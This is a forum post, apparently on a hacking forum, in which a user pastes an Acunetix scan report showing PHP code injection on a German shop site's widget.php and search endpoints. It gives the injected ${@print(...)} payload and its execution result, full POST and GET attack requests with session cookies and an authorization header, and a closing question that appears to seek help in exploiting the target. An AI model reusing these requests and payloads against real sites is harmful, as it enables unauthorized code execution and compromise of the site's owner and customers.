
05.10.2020, 14:41
Newbie
Registered: 09.05.2018
Posts: 22
With us:
4218806
Reputation:
12
Message from Gutman999
I apologize. PHP Code Injection
Code:
PHP code injection
Vulnerability description
This script is vulnerable to PHP code injection.
The vulnerability affects https://www.site.de/widget.php , 7521
Discovered by /Scripts/PerScheme/PHP_Code_Injection.script
Attack details
JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}
Possible execution result:
63c19a6da79816b21429e5bb262daed8
HTTP request
POST /widget.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%20/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_custom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_BasketFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6klz_afKVWU7V:1:0:0:0:true:1
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 309
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1
There is also a GET request
URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}
Possible execution result:
63c19a6da79816b21429e5bb262daed8
HTTP request
GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security_test))} HTTP/1.1
Connection: keep-alive
Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
And what's the host?